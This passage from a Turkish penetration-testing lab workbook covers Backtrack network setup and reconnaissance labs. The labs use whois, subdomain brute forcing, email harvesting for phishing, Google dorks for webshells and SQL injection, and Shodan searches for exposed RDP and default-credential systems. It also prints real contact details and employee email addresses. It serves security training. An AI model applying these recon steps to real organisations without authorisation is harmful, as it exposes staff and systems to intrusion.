kullanabilirsiniz. Bu komut sizing routing tablonuzu görüntüleyecektir.
# route –n
Yukarıdaki resimde yer aldığı gibi, bilinmeyenlerin çıkış noktası (default gateway) 1.1.1.1 olarak
tanımlanmıştır.
DNS Tanımlama
DNS kaydı isimçözme işlevini gerçekleştirecek IP adreslerini içermelidir.
Linux sistemlerde dns sunucuların bilgisi ‘/etc/resolv.conf’ dosyasında tutulur. Dosyas içeriği
‘cat’ komutu ile öğrenilebilir ve yazım formatı aşağıdaki gibidir
# cat /etc/resolv.conf
nameserver dns_sunucu_ip_adresi_1
nameserver dns_sunucu_ip_adresi_2
Değişiklik için bu dosyanın düzenlenmesi gerekmektedir. Backtrack Linux işletim sisteminde
gedit,nano,vi vb. metin editörleri ile bu dosya düzenlenebilir. Görsellik ve kolay kullanıma sahip
olduğu için ‘gedit’ metin editörünü tercih edeceğiz.
Bu örnekte 8.8.8.8 ve 4.2.2.4 dns adresleri tanımlanmıştır.
# gedit /etc/resolv.conf
33.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Static Route Kaydı Girme
Network Ayarlarının Test Edilmesi
Sabit IP ayarları, IP adresinin tanımlanması, Varsayılan Ağ Geçidi ve DNS Kaydı ile son buldu. Ağ
ayarlarını test etmek için aşağıdaki adımlar pratik olarak kullanılabilir.
Yerel ağdaki sistemlere erişimimiz var mı ?
Yerel ağdaki bir sistemping paketleri göndererek öğrenebiliriz.
# ping 1.1.1.1 -c 3
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=64 time=6.65 ms
64 bytes from 1.1.1.1: icmp_seq=2 ttl=64 time=2.16 ms
64 bytes from 1.1.1.1: icmp_seq=3 ttl=64 time=1.62 ms
--- 1.1.1.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.621/3.481/6.653/2.254 ms
Yukarıdaki gibi ping paketlerine yanıt alıyorsak, herşey başarılı yerel ağ ile iletişimimiz mevcut.
Eğer yanıt alamıyorsanız, hedef system ping paketlerine yanıt vermiyor olabilir veya ağ
bağlantınızda bir problem olabilir. Bu kontrolleri en baştan tekrar yapın.
İnternet erişimimiz var mı ?
Bu işlem için iki farklı yöntem kullanabiliriz.
1. İnternette ping paketlerine yanıt veren bir sisteme ping atmak.
# ping 8.8.8.8 -c 3
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=47 time=77.6 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=47 time=81.1 ms
34.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
--- 8.8.8.8 ping statistics ---
3 packets transmitted, 2 received, 33% packet loss, time 2004ms
rtt min/avg/max/mdev = 77.661/79.408/81.155/1.747 ms
2. İnternette bulunan IP adresini bildiğiniz bir web sunucuya bağlantı kurarak.
DNS sunucu isim çözüyor mu ?
Bu işlem için ‘nslookup’ ve ‘dig’ araçları kullanılabilir.
# nslookup cehturkiye.com
# dig A google.com
35.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ayrıca bir internet tarayıcısı ile (firefox gibi) internette bağlanabiliyorsanız da dns sunucunuz
çalışıyor demektir.
Network Ayarlarının Kalıcı Hale Getirilmesi
Yukarıda yaptığımız ayarlar işletim sistemi yeniden başlatıldığında kaybolacaktır. Backtrack Linux
dağıtımında network ayarları ‘/etc/network/interfaces’ dosyasında tutulmaktadır.
Ayarların kalıcı olabilmesi için aşağıdaki formata uygun olarak yazılmalıdır.
auto eth1
iface eth1 inet static
address 1.1.1.1
netmask 255.0.0.0
network 1.1.1.0
broadcast 1.1.1.255
gateway 1.1.1.1
Örnek uygulama
36.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Değişiklikler kaydedildikden sonra ağ ayarlarının her açılışta otomotik olarak çalışması için son
olarak aşağıdaki iki komutu çalıştırmanız yeterlidir.
# update-rc.d networking defaults
# /etc/init.d/networking restart
Kablosuz Ağ Ayaları
Backtrack Linux dağıtımını vmware aracılığı ile kullanıyorsanız fiziksel kablosuz ağ arabirimini
(wireless) tanımlayamazsınız. Sanallaştırma platformları (vmware,virtualbox vb.) bu kitap
yazılırken fiziksel kablosuz ağları sanal işletim sistemine yine kablosuz ağ arabirimi olarak
aktaramamaktadırlar.
37.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Yalnızca USB Kablosuz ağ cihazlarını takıp kullanabilirsiniz. Aşağıdaki gibi bir usb kablosuz ağ
cihazı kablosuz ağlara bağlanmak için idealdir.
Backtrack Linux dağıtımını, sanallaştırma platformu kullanmadan direkt diske kurup
kullanıyorsanız fiziksel makinanızın kablosuz ağ arabirimini görecektir.
USB cihazı fiziksel donanımınıza taktıkdan sonra vmware sanallaştırma platformunda çalışan
Backtrack Linux dağıtımına aktarmak için Player > Removable Devices > ‘USB Cihaz Adı’ >
Connect
Sanal işletim sistemine usb wireless cihaz aktarıldıkdan sonra komut satırından ‘iwconfig’
komutu ile kablosuz ağ arabirimi görüntülenebilir.
# iwconfig
38.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Resimde görüldüğü üzere, ‘wlan0’ olarak isimlendirilmiş. Farklı sistemlerde farklı numaralarla
isimlendirilebilir.
Backtrack Linux dağıtımında kablosuz ağları yönetmek için ‘Wicd Network Manager’ yazılımı
bulunmaktadır. Bu yazılım aracılığıyla kablosuz ağlar yönetilebilir.
‘Applications > Internet > Wicd Network Manager’ sekmesinden açılabilir.
Programdan bir görünüm
39.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Önemli Not: Eğer kablosuz ağ arabiriminizin adı wlan0 değilde farklı bir isimle (örneğin: wlan1
gibi) yer alıyorsa Wicd Network Manager > Preferences penceresinden ‘Wireless interface’
değerini değiştirmeniz gerekmektedir.
Backtrack Temel Ayarları:
40.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Vmware Fusion/Playerüzerinde kurulubacktrackişletimsistemimizile ilgili bazıtemel ayarlar:
Backtrack sisteme bridge moddaIPadresi aldırmak;
Bu şekilde configre edilmiş sistem açıldığında otomatik dhcp den IP almış olarak açılır. Tekrar aldırılmak
istenirse dhclientkomutukullanılabilir;
41.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
IP adresi,ağ maskesi(netmask) ve varsayılan ağ geçidi(default gateway) elle verilmek istenirse aşağıdaki
komutlarkullanılabilir;
42.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Yukarıda verilmiş bilgiler sistem yeniden başlatıldığında silinecektir.IP adresi,ağ maskesi,varsayılan ağ
geçidi kalıcı olarak sisteme verilmek istenirse /etc/network/interfaces dosyası aşağıdaki gibi
düzenlenmelidir.
43.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
İlgili değişiklikler yapıldıktan sonra network servisleri yeniden başlatılmalıdır.Bunun için komut satırından
/etc/init.d/networkingrestart komutuverilebilir.
CEH Eğitimi Lab Çalışmaları:
44.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Hedef Hakkında Bilgi Toplama
Uygulama No: BGA-PT-01
Uygulama Adı: Hedef Sistem Hakkında Temel Bilgi Toplama
Amaç: Hedef hakkında iz bırakmadan bilgi toplamaktır.Bu yüzden hedefe doğrudan gitmek yerine dolaylı
yollarla(whois,robtext.com) sorgulargönderilir.
Lab senaryosu: Örnek web witeleri üzerinden (bga.com.tr, networkpentest.net, facebook.com) çeşitli
bilgilersorgulanacaktır:
● Site sahibi firma/kişi belirleme
● Yönetici epostaadresinitespitetme
● Telefonve adresbilgisi bulma
● Domainbaşlangıç-bitişsüresi belirleme
● ipadresi aralığı
KullanılanAraçlar:
● Whois
● Robtex.com
Adımlar:
1. whoiskomutununsorgulaması(kurulumu/değilmi)
root@bt:~# dpkg -l | grep whois
ii whois 5.0.0ubuntu3 an intelligentwhoisclient
2. Komutsatırından whoisile bilgitoplama
root@bt:~# whois bga.com.tr
** Registrant:
Huzeyfe Onal
Yunusemre cad.
Istanbul,
Türkiye
huzeyfe.onal@gmail.com
+ 90-532-2104118-
+
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
----
Uygulama No: BGA-PT-02
Uygulama Adı: Bir IP Adresi Üzerindeki Sitelerin Bulunması
Amaç: Hedef web uygulamasının barındırıldığı sunucu üzerinde varsa başka web uygulamaları tesbit
edilmesi.Sızma girişimlerinde hedef web uygulamasında herhangi bir güvenlik açığı yoksa aynı sunucu
üzerinde barındırılandiğerwebuygulamalarıhedef olarakseçilirve ilgilisunucuele geçirilmeye çalışılır.
Lab Senaryosu: Belirli web uygulamalarına(bga.com.tr , cnn.com) sorgular çekilerek aynı web sunucu
üzerinde barındırılandiğerwebuygulamalarıtesbitedilmiştir.
KullanılanAraçlar:
● bing.com
● robtex.com
Adımlar:
1. Bingüzerindensanal hostlarıntesbitedilmesi:
sh-3.2# pingbga.com.tr
PINGbga.com.tr(50.22.202.162): 56 data bytes
64 bytesfrom50.22.202.162: icmp_seq=0ttl=40 time=188.390 ms
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
● http://www.networkpentest.net/2011/08/belli-bir-ip-uzerinde-host-edilen-tum.html
---
Uygulama No: BGA-PT-03
Uygulama Adı: Siteye Ait Geçmiş İçeriğin İncelenmesi
Amaç: Sızma testlerinde mevcut bir web uygulamasının geçmiş tarihlerdeki içeriğini incelemek ve
buralardanbilgi toplamak
Lab senaryosu:
Lifeoverip.net web uygulamasının arhive.org üzerinden sorgulanması.Geçmiş tarihlerdeki görünümlerine
ve içeriklerine erişilmesi.
KullanılanAraçlar:
● www.archive.org
Adımlar:
1. Archive.orgüzerindenlifeoverip.netisimli web uygulamasınınsorgulanması:
51.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. 2 Şubat 2008 tarihinde saat07.15’de arşivlenenwebgörünümüve içerikleri:
Ek Kaynaklar:
www.archive.org
52.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
--
Uygulama No: BGA-PT-04
Uygulama Adı: Bir Alan Adına Ait Alt Alan Adlarının (Sub domain) Belirlenmesi
Amaç: Sızma testlerinde hedefi geniş görmek için tüm alt alan adlarının(test.bga.com.tr,
sslvpn.bga.com.trvs.) tesbitedilmesi.
Lab senaryosu:
Bu uygulamainterneterişiminesahipbacktrackLinux dağıtımı kullanılarakhazırlanmıştır.
Belirtilenaraçlarile bga.com.tralanadınınsahipolduğualtalan adları tespitedilecektir.
KullanılanAraçlar:
● fierce.pl
● google
● subdomainLookup.py
● theharvester
Adımlar:
2 farklıyöntemle buişyapılabilir.
1. DNS kaba kuvvet(dnsbrute force) saldırısıile.
Fierce.pl scripti ile alan adlarına yönelik istenilen kelime listesiyle(wordlist) kaba kuvvet saldırıları
gerçekleştirilebilir.İlgilscriptbacktrackdağıtımlarındakurulugelmektedir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
178.18.195.170:mail.bga.com.tr
178.18.197.18:seclabs.bga.com.tr
178.18.197.18:Seclabs.bga.com.tr
178.18.195.170:kayit.bga.com.tr
178.18.195.170:kayseri.bga.com.tr
50.22.202.162:www.bga.com.tr
173.194.65.121:blog.bga.com.tr
Not:Theharvester.py scriptini http://theharvester.googlecode.com/files/theHarvester-2.2.tar adresinden
indirebilirsiniz.Sıkıştırılmış .tar uzantılı dosyayı açmak için tar -xvf dosyaadı şeklinde bir komut
kullanabilirsiniz.
Ek Kaynaklar:
---
Uygulama No: BGA-PT-05
Uygulama Adı: Hedef Domaine Ait E-posta Adreslerinin Belirlenmesi
Amaç: Sızma testlerinin ilerleyen adımlarında (sosyal mühendislik,phishing vs) kullanmak
hedeflenmektedir.Sızılan email hesaplarından uzak bağlantılar için kullanılan vpn bilgilerine erişerek iç
networklerde tamkontrol sağlanır.
Lab senaryosu:
Bilgi güvenliği akademisi(BGA) şirketi çalışanlarına ait şirket mail adreslerinin theharvester ve metasploit
aracılığı ile tesbitedilmesi.
KullanılanAraçlar:
● tharverster
● metasploit/aux (search_email_collector) modülü
Adımlar:
1. Theharverster yazılımıkullanarakbiralanadına ait ile e-postaadreslerini bulmak:
root@bt:~/theHarvester# python theHarvester.py-d bga.com.tr -l 500 -ball
[+] Emails found:
------------------
Huzeyfe.onal@bga.com.tr
mehmet.i...@bga.com.tr
bilgi@bga.com.tr
ozan.ucar@bga.com.tr
ucar@bga.com.tr
57.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
huzeyfe.onal@bga.com.tr
egitim@bga.com.tr
mehmet.ince@bga.com.tr
oucar@bga.com.tr
ozan...@bga.com.tr
siberkamp@bga.com.tr
honal@bga.com.tr
kayseri@bga.com.tr
gbeksen@bga.com.tr
ince@bga.com.tr
sigak@bga.com.tr
huzeyfe.onal@bga.com.tr
honal@bga.com.tr
cdogru@bga.com.tr
sigak@bga.com.tr
Theharvester; email adreslerini google, bing, bingapi, pgp, linkedin, google-profiles, people123 ve jigsaw
gibi sosyal ortamve arama motorlarındantoplamaktadır.
2. Metasploit auxiliary modüllerinden olan search_email_collector isimli modül aracılığı ile emailleri ele
geçirme.Bu modül google,yahoo ve bing arama motorlarından ilgili domain uzantılı mail adreslerini
toplamaktadır.
msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) >show options
Module options(auxiliary/gather/search_email_collector):
Name CurrentSetting Required Description
---- --------------- -------- -----------
DOMAIN yes The domainname to locate email addressesfor
OUTFILE no A filenametostore the generatedemaillist
SEARCH_BINGtrue yes Enable Bingas a backendsearchengine
SEARCH_GOOGLE true yes Enable Google asa backendsearchengine
SEARCH_YAHOO true yes Enable Yahoo!as a backendsearch engine
msf auxiliary(search_email_collector) >set DOMAIN bga.com.tr
DOMAIN => bga.com.tr
msf auxiliary(search_email_collector) >exploit
[*] Harvestingemails.....
[*] SearchingGoogle foremail addressesfrombga.com.tr
[*] ExtractingemailsfromGoogle searchresults...
58.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[*] SearchingBingemail addressesfrombga.com.tr
[*] ExtractingemailsfromBingsearchresults...
[*] SearchingYahooforemail addressesfrombga.com.tr
[*] ExtractingemailsfromYahoosearchresults...
[*] Located14 email addressesforbga.com.tr
[*] bilgi@bga.com.tr
[*] cdogru@bga.com.tr
[*] egitim@bga.com.tr
[*] galkan@bga.com.tr
[*] gbeksen@bga.com.tr
[*] honal@bga.com.tr
[*] huzeyfe.onal@bga.com.tr
[*] kktc@bga.com.tr
[*] mehmet.ince@bga.com.tr
[*] oucar@bga.com.tr
[*] ozan.u...@bga.com.tr
[*] ozan.ucar@bga.com.tr
[*] siberkamp@bga.com.tr
[*] sigak@bga.com.tr
[*] Auxiliarymoduleexecutioncompleted
Ek Kaynaklar:
---
Uygulama No: BGA-PT-06
Uygulama Adı: Google Arama Motoru Kullanarak Bilgi Toplama
Amaç:Google arama motoru üzerinden zayıf hedef sistemlerin bulunması ve hedef sistem hakkında
hassasbigiler(kullanıcıadı,parola,yedekveritabanlarıvs.) toplamak.
Gelişmişgoogleoperatorlerininkullanımı
site,intitle,inurl,index.of,filetype…
Google üzerindengüvenlikaçığıbarındırsan sistemleri bulma
Google üzerindenSQLi,LFI,RFIbarındırsansistembulma
Google üzerindenkurumve ülkelere aithassasbilgileri bulma
Lab senaryosu:
Google üzerinden özel arama parametreleri açıklanacak ve ardından çeşitli güvenlik açıklarını içeren web
uygulamalarıtesbitedilecek.Hedef webuygulamalarındahassasbilgileraranacaktır.
59.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
KullanılanAraçlar:
● Google.com
Adımlar:
1.Adım: Google arama parametrelerinintanıtılması:
Site:Belirlirbirdomainuzantısındaveyadomainde arar.
site:tr , site:fr, site:com.tr ,site: networkpentest.net
şeklindekullanılabilir.
Filetype:Belli birdosyauzuntısındakidosyalarıarar.
filetype:pdf ,filetype:mdb,filetype:xls,filetype:doc, filetype:log
şeklindekullanılabilir.
Ext: Filetype ileaynıamaçlakullanılır.
ext:dbx, ext:sql , ext:pst
şeklindekullanılabilir.
Link: Aranılanifadayi bağlantıverilmiş(link)yerlerde ararve bulinklerinverildiği siteleri bulur.
link:bga.com.tr
şeklindekullanılabilir.
Cache: Aranılan sitenin en son google tarafından cachelendiği tarih ve saat bilgisi ile birlikte ve cachede
tutulanweb
sitesini getirir
cache:bga.com.tr
şeklindekullanılabilir.
Intext/allintext:İfadeyi websitelerintextkısmındaarar.
intext:username password , allintext:username password
şeklindekullanılabilir.
Inurl/alinurl:İfadeyi url’de arar.
inurl:admin, inurl: “/admin/“, allinurl:webmail ,allinurl:adminpanel,inurl:https, inurl:wp-content
şeklindekullanılabilir.
Intitle/allintitle:İfadeyiwebsitelerinintitle’ıiçerisinde arar.
intitle:”NetworkCamera” ,intitle:"WJ-NT104Main"
şeklindekullanılabilir.
2. Adım:Google üzerindenc99.phpwebshell’I atılmışwebsitesibulma;
60.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım: Google üzerindensql injectionaçıklığıbulma;
BulduğumuzbirURL’de keyfi karakter(‘) gönderereksonucunugörelim.
Görüldügü gibi veritabanı sytax error döndü. Bir sql injection açıklığını google üzerinden rahatlıkla
bulabildik.
4.Adım: İçerisinde kullanıcıadıveyaparola bilgisi olanexcel dosyalarınıgoogle üzerindenaratalım.
61.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-07
Uygulama Adı: ShodanHq Arama Motoru KullanarakBilgi Toplama
Amaç: Belli bölgelerde (Ip adresi aralıklarında,ülke,şehir,kurum v.b) güvenlik zafiyeti içeren sistemleri
belirlemek içinkullanılır.
Lab senaryosu:
Bu uygulamainterneterişiminesahipbacktrackLinux dağıtımıkullanılarakhazırlanmıştır.
● Çindeki Uzakmasaüstüportu(3389) açık olan sistemler
● Türkiyede bursailindeki 3389 portu açık olansistemler
● AmerikadaHTTP-80portu üzerindendefaultkullanıcıadı/şifresi olansistemler
● 212.0.0.0/8 alt ağındaki sshservisi açık olansistemler
● İzmirdeki TürkTelekomIPadreslerinde3389 portu açık olan sistemlertesbitedilecektir.
KullanılanAraçlar:
Shodanhq.com
Adımlar:
1. Adım: Shodan ile ülke bazında açıklıklar bulunabilir..Çindeki Uzak masaüstü portu(3389) açık olan
sistemleri bulalım:
62.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Adım: Shodan ile il/şehir bazında açıklıklar bulunabilir.Türkiyede bursailindeki 3389 portu açık olanları
bulalım;
63.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3. Adım: Shodan ile default kullanıcı adı/şifreye sahip sistemler bulunabilir.Amerikada HTTP-80 portu
üzerindendefaultkullanıcıadı/şifresi olansistemleri bulalım;
64.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Shodan ile belli bir subnet içindeki sistemlerde açıklık aranabilir.212.0.0.0/8 alt ağındaki ssh
servisi açıkolansistemleri bulalım;
5. Adım: Shodan ile belli bir kuruma ait açıklıklar bulunabilir.İzmirdeki Türk Telekom IP adreslerinde 3389
portu açık olansistemleri bulalım;
Ek Kaynaklar:
65.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
http://www.shodanhq.com
http://blog.bga.com.tr/2011/04/pentest-calsmalarnda-shodanhq-arama.html
---
Uygulama No:BGA-PT-08
Uygulama Adı: Hedef Sisteme Ait Ağ Haritasının Belirlenmesi
Amaç: Hedef sistem önünde bulunan ağ ve güvenlik cihazlarının belirlenmesi, hedef sisteme giden ağ
yolununbelirlenmesi.
Lab senaryosu:
Sızma testlerinin en önemli adımlarından biri olan ağ keşif çalışmaları hedef sistemlere ait temel ağ ve
güvenliksistemlerinibelirlemekiçinkullanılabilir.
KullanılanAraçlar:
● traceroute
● tcptraceroute
● visual traceroute(webüzerindensiteler)
● serversniff(websitesinden)
Adımlar:
1. Adım:Traceroute kullanarakhedef sistemegidenyollarınbelirlenmesi
root@bt:/# traceroute cnn.com
tracerouteto cnn.com(157.166.226.26), 30 hopsmax,60 byte packets
1 192.168.1.1 (192.168.1.1) 77.405 ms 86.273 ms 90.461 ms
2 95.14.64.1.dynamic.ttnet.com.tr(95.14.64.1) 122.016 ms 134.480 ms 148.268 ms
3 81.212.77.117.static.turktelekom.com.tr (81.212.77.117) 161.810 ms 174.458 ms 187.620 ms
4 hlkli-3-2-hlkli-3-1.turktelekom.com.tr(81.212.219.230) 201.898 ms 214.546 ms 227.409 ms
5 v-col-1-acbdm-2-1.turktelekom.com.tr(212.156.140.41) 301.013 ms 316.116 ms 327.398 ms
6 xe-8-1-2.edge5.Frankfurt1.Level3.net(212.162.4.89) 354.105 ms 115.438 ms 171.476 ms
7 vlan70.csw2.Frankfurt1.Level3.net (4.69.154.126) 196.026 ms vlan60.csw1.Frankfurt1.Level3.net
(4.69.154.62) 201.490 msvlan70.csw2.Frankfurt1.Level3.net(4.69.154.126) 220.738 ms
8 ae-61-61.ebr1.Frankfurt1.Level3.net (4.69.140.1) 224.008 ms ae-71-71.ebr1.Frankfurt1.Level3.net
(4.69.140.5) 236.881 ms ae-91-91.ebr1.Frankfurt1.Level3.net(4.69.140.13) 252.313 ms
9 ae-48-48.ebr2.Paris1.Level3.net (4.69.143.146) 266.143 ms ae-45-45.ebr2.Paris1.Level3.net
(4.69.143.134) 279.268 ms ae-46-46.ebr2.Paris1.Level3.net(4.69.143.138) 297.170 ms
66.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
10 ae-42-42.ebr2.Washington1.Level3.net (4.69.137.54) 380.916 ms ae-41-
41.ebr2.Washington1.Level3.net (4.69.137.50) 392.665 ms ae-42-42.ebr2.Washington1.Level3.net
(4.69.137.54) 405.311 ms
11 ae-62-62.csw1.Washington1.Level3.net (4.69.134.146) 419.796 ms ae-72-
72.csw2.Washington1.Level3.net(4.69.134.150) 440.103 ms 453.333 ms
12 ae-71-71.ebr1.Washington1.Level3.net (4.69.134.133) 288.946 ms ae-91-
91.ebr1.Washington1.Level3.net (4.69.134.141) 190.648 ms ae-61-61.ebr1.Washington1.Level3.net
(4.69.134.129) 221.909 ms
13 ae-2-2.ebr3.Atlanta2.Level3.net(4.69.132.85) 247.504 ms 259.513 ms 276.051 ms
14 ae-73-73.ebr2.Atlanta2.Level3.net (4.69.148.254) 286.905 ms ae-63-63.ebr1.Atlanta2.Level3.net
(4.69.148.242) 302.563 ms 312.353 ms
15 ae-1-51.edge4.Atlanta2.Level3.net(4.69.150.13) 324.613 ms 257.411 ms 257.327 ms
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *
Görüldüğü gibi 15. adımdan sonra * işaretleri görünüyor.16. cihaz veya bu aşamadan sonraki cihazlar,
traceroute aracının kullandığı UDP/ICMP protokollerinin geçişine izin vermediği için 15. hoptan sonraki
cihazı göremiyoruz.
2.Adım: Aynı hedefe tcptracerouteile sorgugönderelimve aradaki hoplarıgörelim;
root@bt:/# tcptraceroute cnn.com
Selected device eth0, address192.168.1.102, port38188 for outgoing packets
Tracing thepathto cnn.com(157.166.255.18) on TCP port80 (www),30 hopsmax
1 192.168.1.1 17.155 ms 9.285 ms 9.785 ms
2 95.14.64.1.dynamic.ttnet.com.tr(95.14.64.1) 29.379 ms 29.155 ms 30.760 ms
3 81.212.77.117.static.turktelekom.com.tr (81.212.77.117) 32.025 ms 30.228 ms 31.200 ms
4 hlkli-3-2-hlkli-3-1.turktelekom.com.tr(81.212.219.230) 34.793 ms 30.362 ms 30.904 ms
67.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5 v-col-1-acbdm-2-1.turktelekom.com.tr(212.156.140.41) 96.462 ms 90.840 ms 92.208 ms
6 xe-8-1-2.edge5.Frankfurt1.Level3.net(212.162.4.89) 102.390 ms 104.178 ms 105.985 ms
7 vlan80.csw3.Frankfurt1.Level3.net(4.69.154.190) 115.068 ms 105.131 ms
vlan60.csw1.Frankfurt1.Level3.net(4.69.154.62) 109.796 ms
8 ae-71-71.ebr1.Frankfurt1.Level3.net(4.69.140.5) 107.588 ms
ae-61-61.ebr1.Frankfurt1.Level3.net(4.69.140.1) 104.836 ms
ae-81-81.ebr1.Frankfurt1.Level3.net(4.69.140.9) 105.911 ms
9 ae-47-47.ebr2.Paris1.Level3.net(4.69.143.142) 108.068 ms
ae-48-48.ebr2.Paris1.Level3.net(4.69.143.146) 107.917 ms 116.164 ms
10 ae-44-44.ebr2.Washington1.Level3.net(4.69.137.62) 178.588 ms 180.744 ms
ae-42-42.ebr2.Washington1.Level3.net(4.69.137.54) 182.262 ms
11 ae-72-72.csw2.Washington1.Level3.net(4.69.134.150) 183.017 ms
ae-92-92.csw4.Washington1.Level3.net(4.69.134.158) 187.344 ms
ae-72-72.csw2.Washington1.Level3.net(4.69.134.150) 181.159 ms
12 ae-71-71.ebr1.Washington1.Level3.net(4.69.134.133) 180.908 ms 181.484 ms
ae-61-61.ebr1.Washington1.Level3.net(4.69.134.129) 180.068 ms
13 ae-2-2.ebr3.Atlanta2.Level3.net(4.69.132.85) 196.958 ms 194.500 ms 193.292 ms
14 ae-63-63.ebr1.Atlanta2.Level3.net(4.69.148.242) 195.753 ms 203.692 ms 199.475 ms
15 ae-11-51.car1.Atlanta1.Level3.net(4.69.150.3) 368.448 ms 378.168 ms
ae-21-52.car1.Atlanta1.Level3.net(4.69.150.67) 307.301 ms
16 TIME-WARNER.car1.Atlanta1.Level3.net(4.71.20.14) 195.394 ms 194.808 ms 195.858 ms
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 www.cnn.com(157.166.255.18) [open] 198.107 ms 195.051 ms 269.478 ms
Görüldügü gibi 16. cihazın da IP adresini gördük.4.69 ile devam eden IP adreslerini bitirdik birde 4.71 ile
devam eden IP adreside gördük. Bu IP adresine sahip cihaz bizim hedefimizin hemen önündeki
cihazdır.Güvenlik duvarı olma olasılığı yüksek.Bir önceki traceroute örneğimizde UDP/ICMP paketlerini
engelleyensistemdebudur.
3. Adım: http://just-traceroute.com/ sitesini kullanarak farklı ülkelerden bir hedefe aynı anda traceroute
atmak;
68.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-09
Uygulama Adı: Hedef Sistem Ağ ve Güvenlik Sistemlerini Belirleme
